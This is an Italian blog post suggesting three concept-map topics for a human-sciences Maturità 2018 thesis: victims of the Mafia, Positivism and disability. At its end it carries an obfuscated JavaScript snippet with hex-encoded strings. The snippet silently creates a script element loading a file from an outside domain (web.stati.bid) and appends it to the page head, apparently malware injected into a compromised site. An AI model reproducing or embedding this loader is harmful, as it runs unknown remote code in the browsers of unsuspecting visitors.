Mappe Concettuali 2018 per Scienze Umane

Frequenti il liceo delle scienze umane, senti che il giorno della Maturità 2018 si avvicina e non riesci a trovare un percorso, una tesina inerente al tuo percorso scolastico? Di certo non è facile, lo sappiamo, in quanto occorre individuare l’argomento giusto e trovare i collegamenti tra tutte le materie. Noi abbiamo deciso di aiutarti, fornendoti tre mappe concettuali da usare come punto di partenza per il tuo personale percorso.

Non perderti: Tesina Maturità: mappe concettuali

Mappa Concettuale Tesina Maturità 2018: Scienze Umane

Il liceo delle scienze umane offre dei percorso abbastanza ampi che abbracciano diverse materie e diversi argomento; questo per gli studenti che frequentano questo tipo di scuola non può essere che un vantaggio perché non sono limitati nell’argomentare, anzi, possono spaziare il loro percorso e la mappa concettuale prendendo come argomento principale qualsiasi ambito, sia sociale che fisico e biologico. Ora vi presenteremo tre mappe concettuali con percorsi abbastanza articolati e che abbracciano e si collegano a tutte le materie.

Mappa Concettuale: Vittime della Mafia

Attualità, storia, conseguenze, strazio, sacrificio e vittime, elementi che si collocano in un solo percorso, cioè quello delle vittime della Mafia. Non sono collegate a tutte le materie del programma delle scienze umane, ma sono un’opportunità per far vedere alla commissione la propria preparazione non solo sulle materie studiate nell’anno scolastico, ma anche una preparazione personale e culturale che di certo può incidere molto, ovviamente in modo positivo, sulla valutazione finale.

Mappa Concettuale Scienze Umane: il Positivismo

La seconda Mappa Concettuale che vi proponiamo è il percorso sul Positivismo, argomento che può essere ben collegato sia alla filosofia dell’800 che  alla criminologia moderna. Quindi perfetto argomento collegato a tutte le materie studiate durante l’anno scolastico 

Tesina Scienze Umane: mappa concettuale sulla disabilità

Terzo ed ultima mappa concettuale tratta l’argomento della disabilità, argomento alquanto delicato, ma che abbraccia, anche questo, tutte le materie e il programma svolto durante l’anno scolastico. Argomento che spazia molto e che, soprattutto, occupa un ruolo principale sull’aspetto dell’inclusione sia nel mondo scolastico ce nella società. Conferma è la nascita di centri, luoghi e cooperazione per l’integrazione dei disabili.

var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)